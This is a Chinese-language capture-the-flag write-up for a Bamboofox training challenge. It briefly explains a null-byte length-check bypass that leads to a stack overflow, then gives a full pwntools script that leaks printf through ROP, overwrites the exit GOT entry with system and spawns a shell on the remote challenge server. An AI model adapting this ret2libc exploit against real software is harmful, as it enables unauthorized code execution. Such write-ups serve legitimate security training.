# Bamboofox/train/I Love C [100] ###### tags: `CTF`,`PWN`,`Bamboofox`,`writeup` 題目檔案連結:http://gofile.me/6lhQ2/YbYOJJaXi 名字的長度是0x14，因字串的檢查是使用strlen，因此使用\x00截斷可多塞一個\xff蓋到max_len 題目有開nx，做ROP，印出printf的got，再返回main 將printf改成system，然後進入有使用到printf的exit() ``` # -*- coding: UTF-8 -*- from pwn import * context.arch = 'i386' local = False debug = False gdb1 = False elf1 = ELF("./libc.so.6") elf2 = ELF("./lovec") if debug == True: context.log_level = "debug" if local == True: r = process("./lovec") if gdb1 == True: gdb.attach(r) else: r = remote('bamboofox.cs.nctu.edu.tw', 11003) def overflow(): r.recvuntil("name:") r.send("a"*0x13+"\x00"+"\xff") r.recvuntil("10. C") r.sendline("1") r.recvuntil("Cool! And why did you like it?") main = elf2.symbols['main'] puts = elf2.symbols['puts'] read = elf2.symbols['read'] printf_got = elf2.got['printf'] pop_ebx_ret = 0x080483b9 pop_esi_pop_edi_pop_ebp_ret = 0x080487fd exit_plt = elf2.plt['exit'] exit_got = elf2.got['exit'] printf_offset = elf1.symbols['printf'] system_offset = elf1.symbols['system'] overflow() r.send(b"a"*41+p32(puts)+p32(pop_ebx_ret)+p32(printf_got)+p32(main)) r.recvuntil("day!\n") rec = r.recv(4) printf_libc = u32(rec) overflow() r.send(b"a"*41+p32(read)+p32(pop_esi_pop_edi_pop_ebp_ret)+p32(0)+p32(exit_got)+p32(0x100)+p32(exit_plt)+p32(0)+p32(exit_got+4)+b"\n") r.recvuntil("day!\n") r.sendline(p32(printf_libc-printf_offset+system_offset)+b"/bin/sh\x00") #online r.sendline("cat /home/ctf/flag") r.interactive() ```